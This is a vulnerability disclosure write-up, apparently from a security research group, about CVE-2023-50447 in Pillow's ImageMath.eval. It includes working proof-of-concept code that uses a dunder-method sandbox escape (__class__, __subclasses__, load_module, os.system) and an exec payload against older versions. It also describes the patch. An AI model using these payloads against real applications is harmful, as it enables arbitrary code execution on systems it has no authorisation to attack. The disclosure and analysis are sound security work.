As part of the Checkmarx Research Group’s routine activities, we often conduct security assessments of open-source technologies to refine both our tools and our skillset. During one of these activities, I identified a Critical vulnerability in Pillow. It is present in the PIL.ImageMath.eval function, in versions up to and including 10.1.0. This vulnerability was later assigned CVE-2023-50447.
CVSS v3.1: 8.1
Serving as the successor to the Python Imaging Library (PIL), Pillow is a Python imaging library that provides a comprehensive set of tools for opening, manipulating, and saving various image file formats. It is widely used in web development, data analysis, computer vision, and other domains, offering a user-friendly interface. With support for numerous image formats and a rich set of features, Pillow is a go-to solution for developers and designers working with images in Python applications.
The ImageMath module provides a single eval function, which takes an expression string and one or more images. It’s basically a wrapper around Python’s built-in eval function, but with a few more special operations for working with images. You can read more about this function and how it works in the Pillow documentation. Here is a usage example from the documentation, which includes two of the built-in functions, convert and min:
from PIL import Image, ImageMath

with Image.open('image1.jpg') as im1:
    with Image.open('image2.jpg') as im2:
        # Pixel-wise minimum of the two images, converted to 8-bit grayscale ('L')
        out = ImageMath.eval("convert(min(a, b), 'L')", a=im1, b=im2)

out.save('result.png')
It’s not the first time a vulnerability leading to (spoiler alert!) arbitrary code execution has been discovered in this function. Versions prior to 9.0.1 were vulnerable to CVE-2022-22817. In those versions, PIL.ImageMath.eval allowed the evaluation of arbitrary expressions (i.e. there was no validation whatsoever of the expression provided), so it was trivial to get code execution, e.g. ImageMath.eval('exec(...)').
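To make this concrete, here is a minimal sketch of what such a payload could look like against a pre-9.0.1 version (the command being executed is purely illustrative):

from PIL import ImageMath

# On Pillow < 9.0.1 the expression was handed to Python's eval() with no
# name filtering, so the builtin exec() was directly reachable:
ImageMath.eval("exec('import os; os.system(\"whoami\")')")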
To prevent this vulnerability, a commit was made with the aim of restricting the builtins available to PIL.ImageMath.eval(). Let’s review this snippet of Pillow’s code with the filter responsible for ensuring that we’re not evaluating arbitrary objects:
code = compile(expression, "<string>", "eval")
...
for name in code.co_names:
    if name not in args and name != "abs":
        msg = f"'{name}' not allowed"
        raise ValueError(msg)
- expression refers to the first parameter of PIL.ImageMath.eval, i.e. the string containing a Python-style expression;
- args contains values to add to the evaluation context, which includes some built-in functions as well as the arguments passed to the second parameter of PIL.ImageMath.eval, so that they can be referenced inside the expression;
- compile is a Python built-in function (docs) that compiles an expression into a code or AST object, so that it can later be executed by exec or eval;
- co_names is an attribute of a code object that returns a tuple containing the names used in the expression (e.g. names of variables and functions); to be more precise, these are the names referenced by the compiled bytecode object.
So what’s happening here is that it’s checking the names in the expression against an allowlist (i.e. args). On the surface, it seems like a good solution, but like everything in application security, the devil is in the details…
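To see the check in action, here is a small standalone sketch (no Pillow required; the args dict is just a stand-in for Pillow's real evaluation context):

# The docs example: every name referenced by the expression is in the context
args = {"a": "im1", "b": "im2", "min": "built-in", "convert": "built-in"}
code = compile("convert(min(a, b), 'L')", "<string>", "eval")
print(code.co_names)  # ('convert', 'min', 'a', 'b') -> all present in args

# An attacker's expression references a name outside the allowlist
code = compile("exec('whoami')", "<string>", "eval")
print(code.co_names)  # ('exec',) -> not in args, so Pillow raises ValueError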
Take a look at the code snippet one more time: what would happen if we could control this allowlist? We’d be able to use whatever “co_names” we wanted and thus achieve arbitrary code execution! Unfortunately, it’s not that simple… We can’t just add an exec to the PIL.ImageMath.eval context and use the payload we saw earlier in CVE-2022-22817, because that exec won’t be the Python function, but an Image passed in as an argument:

ImageMath.eval("exec(...)", exec=Image.open(...))
Hmm… Now what? How can we bypass this? We need permission to use the “co_names” we want, and at the same time we need those names to resolve to the functions we actually want to call, not just to the objects passed as arguments. It was at this point that I remembered some challenges from CTFs I played in the past related to Python jail/sandbox escapes: to bypass this, we can use Python’s dunder (or magic) methods! Allow me to explain…
Although we can’t call arbitrary functions in the context of eval, by controlling this allowlist we can call arbitrary methods on any object that is present. This is because the name of a method is resolved in a different context from the name of a variable. For example, taking the code above, it’s easy to see that the exec in exec('whoami') is different from the one in Palpatine.exec('Order 66'). In the latter case, our exec won’t be “replaced” by the object passed to the PIL.ImageMath.eval context, since it is the exec attribute of the Palpatine object and not a standalone name.
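A quick standalone illustration of this distinction (not Pillow code): the attribute name still shows up in co_names, but at runtime Python resolves it on the object itself, ignoring the evaluation environment:

# 'upper' appears in co_names just like a variable name would...
print(compile("'order 66'.upper()", "<string>", "eval").co_names)  # ('upper',)

# ...but it is looked up on the str object at runtime, so shadowing it in
# the environment has no effect:
env = {"upper": "definitely not a function"}
print(eval("'order 66'.upper()", {"__builtins__": {}}, env))  # ORDER 66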
In short, we now have the ability to call arbitrary attributes. This, along with the existence of dunder methods, can be used to achieve arbitrary code execution. HackTricks has some payloads that we can use for this.
That said, exploiting this vulnerability faces some obstacles in real scenarios, resulting in high attack complexity and reduced overall risk: the images passed to the environment must be able to have names like “__class__”. Although this is a valid file name, the application needs to save the images without changing that name; for instance, something as simple as appending a file extension (e.g. .jpg) to the filename would already prevent this vulnerability from being exploited.
It’s finally time to write a proof of concept (PoC). For this PoC we need five images with the names “__class__”, “__bases__”, “__subclasses__”, “load_module”, and “system”. Note that these are valid file names on any OS.
from PIL import Image, ImageMath

# The attacker-controlled file names double as allowlisted names ("co_names")
image1 = Image.open('__class__')
image2 = Image.open('__bases__')
image3 = Image.open('__subclasses__')
image4 = Image.open('load_module')
image5 = Image.open('system')

# Classic sandbox-escape chain; the subclass index (104) is environment-specific
expression = "().__class__.__bases__[0].__subclasses__()[104].load_module('os').system('whoami')"

# The images become accessible in the expression under their filenames
environment = {
    image1.filename: image1,
    image2.filename: image2,
    image3.filename: image3,
    image4.filename: image4,
    image5.filename: image5
}

ImageMath.eval(expression, **environment)
We are assuming that an attacker can control both the expression and the names of the images passed to the environment (i.e. the environment keys). In this snippet, the images supplied to the PIL.ImageMath.eval context are accessible within the expression via their filenames, which allows us to use those filenames to call attributes with the same names. In a real application, this could happen if there was, for example, a feature that allowed us to upload images and another feature that let us evaluate expressions containing our images, with their respective names, through PIL.ImageMath.eval (this would make a good web CTF challenge, hmm…). Having managed to call arbitrary attributes, all that remains is to find a chain of dunders that lets us execute code; for this we use the chain described in expression. That’s it!
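One practical note on the chain: the subclass index (104 above) is specific to my environment and shifts between Python versions and builds. A hypothetical helper (not part of the original PoC) to locate a suitable loader looks like this:

# Enumerate object's subclasses and flag any class exposing load_module
for i, cls in enumerate(().__class__.__bases__[0].__subclasses__()):
    if hasattr(cls, "load_module"):
        print(i, cls)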
I reported this vulnerability to the Pillow maintainers, and it was fixed in version 10.2.0 (commit), as described in the Release Notes. To prevent this, keys matching the names of builtins and keys containing double underscores now raise a ValueError.
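As a quick illustration (assuming Pillow >= 10.2.0 and the same image files as in the PoC; the exact error message may differ), the patched check rejects such keys before any evaluation takes place:

from PIL import Image, ImageMath

# A dunder key in the environment is now rejected up front
ImageMath.eval("a", {"__class__": Image.open('__class__')})
# ValueError: '__class__' not allowed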
I would also like to take this opportunity to thank the Pillow maintainers for their efficient communication and professionalism.
Thanks for reading, I hope it was interesting! 🙂